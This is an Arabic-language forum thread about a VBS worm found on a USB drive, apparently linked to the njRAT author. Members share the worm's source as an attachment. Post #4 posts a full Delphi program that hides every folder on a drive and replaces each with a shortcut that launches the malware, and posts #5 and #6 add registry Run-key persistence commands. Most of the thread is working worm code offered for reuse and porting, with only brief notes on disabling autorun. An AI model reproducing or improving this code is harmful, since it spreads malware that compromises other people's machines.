وجدت فيرس vbs في الفلاش
#1
السلام عليكم
وجدت دودة في usb فما طريقة الانتشار فهي بالاختصارات ينشا اختصار باسم الملفات الموجودة في الفلاش ويكون الملف الهدف هو الفيرس اي ان هذا الاختصار يفتح الفيرس
PHP كود :
TargetPath := ParamStr(1
المبرمج اعرفه واسمه njq8 وهو عربي برمج برنامج اختراق اسمه njrat باستخدام خردة vb.net
ما ادهشني قوة الانتشار usb وبساطة السورس
يمكنكم الاطلاع على السورس في المرفقات
لقد قمت بتغيير الهوست الى "127.0.0.1" تركته بدون "" لان المبرمج اصبح يتحكم في الفيرس باداة تحكم باستخدام IdHTTPServer
انا فاهم الكود من لم يفهم شيا فليضع تسائله هنا


الملفات المرفقة
.rar   njq8txt.rar (الحجم : 2.42 KB / التحميلات : 139)
الرد
#2
نعم الانتشار عبر الاختصارات والكود قوي يا ليت واحد يحوله للدلفي
الرد
#3
هل فعلا الدودة ذاتية التشغيل؟
الرد
#4
kakarotte كتب :نعم الانتشار عبر الاختصارات والكود قوي يا ليت واحد يحوله للدلفي
برمجته منذ مدة
PHP كود :
program virusLNKDZ;
// by onexite
uses
  SysUtils
,
  
ActiveX,
  
ComObj;

procedure run();
var
  
WshShell OLEVariant;
  
oShellLink   OLEVariant;
  
searchResult TSearchRec;

begin

 
//SetCurrentDir('..');
     
WshShell := CreateOleObject('WScript.Shell');
  if 
FindFirst('*'faDirectorysearchResult) = 0 then
  begin
    repeat

if (searchResult.attr and faDirectory) = faDirectory then
begin
oShellLink  
:= WshShell.CreateShortcut(searchResult.Name+'.lnk') ;
if ((
searchResult.Name<>'.') and (searchResult.Name<>'..') )then
FileSetAttr
(searchResult.Name,2) ;
oShellLink.TargetPath := ParamStr(1);
oShellLink.IconLocation := '%SystemRoot%\system32\SHELL32.dll, 3'  ;
oShellLink.WindowStyle := ;
oShellLink.Save
end
;
    
until FindNext(searchResult) <> 0;
    
FindClose(searchResult);
  
end;

end;

begin
 
try
    
CoInitialize(nil);
    try
     
run();
    finally
      
CoUninitialize;
    
end;
 
except
   
Exit;
  
end;
end
الرد
#5
ahmed2 كتب :هل فعلا الدودة ذاتية التشغيل؟
نعم ذاتية التشغيل

PHP كود :
sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn,  chrw(34) & dr & fn & chrw(34), "REG_SZ
الرد
#6
اضافة البرنامج الى بدا التشغيل

PHP كود :
WinExec(PChar('cmd /C reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v virus /d "'+paramstr(0)+'" /f'),1)
else
WinExec(PChar('cmd /C reg DELETE "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v virus /f'),1
الرد
#7
بارك الله فيك أخي الكريم و لكن ما شرح الكود
الرد
#8
هل يوجد ملف يبدا باسم auto وينتهي بلاحقة ini ؟
غالباً هذا الملف يتم تحميلة تلقائاً من النظام نفسه على اساس انه سيحمل خصائص الـ USB من ايقونة وبعض الامور الآخرى
لكن يتم إستغلاله لتشغيل برامج خبيثه , فهذه اكثر الطرق الشائعه لعمل دودة على فلاش , ويوجود امور آخرى مثلاً استعمال
الملف المخفي الذي يحمل خصائص المجلد الرئيسي في الـ USB يمكن استغلاله فمسـاعدة إنتشار الدودة .

على كلا لست املك ويندوز لذلك لا ساتطيع التنقيح معك Smile , وهذا أحد اسباب توجهي إلى لينكس فلا تجد الفيورسات طريقها إلي Big Grin

---
بالمناسبة يوجد طريقة لتعطيل تحميل او تشغيل الـ USB تلقائي وكذلك ملفات اللاحقة vb (اعتقد هذه هي الاحقة الخاصة بالسكربتات إن لم اكن مخطئ)
من خلال لوحة التحكم والريجستري
الرد
#9
مهند الرسيني كتب :هل يوجد ملف يبدا باسم auto وينتهي بلاحقة ini ؟
غالباً هذا الملف يتم تحميلة تلقائاً من النظام نفسه على اساس انه سيحمل خصائص الـ USB من ايقونة وبعض الامور الآخرى
اغلب الضن لم تطلع على الموضوع Big Grin
الانتشار المقصود عبر الاختصارات و ليس الاتوران :p
الدودة سكريبت vbs لاتحتاج تنقيح
الرد
#10
فعلاً لم اطلع على الموضوع بشكل جيد xD
لكن ضننت انه مشابه لفيروس صادفته ذات مره
ويعمل بطريقة مشابهه وهي ان يضع ملفات تنفيذية بنفس ايقونات الملفات الموجودة على الفلاش
ويخفي الملفات الاصلية وعند الضغط على الملف التنفيذي(الذي انشئه الفيروس) يتم فتح الملف الاصلي المخفي

كم لو انها ملفات اختصارات(lnk)
الرد


التنقل السريع :


مستخدمين يتصفحوا هذا الموضوع: 1 ضيف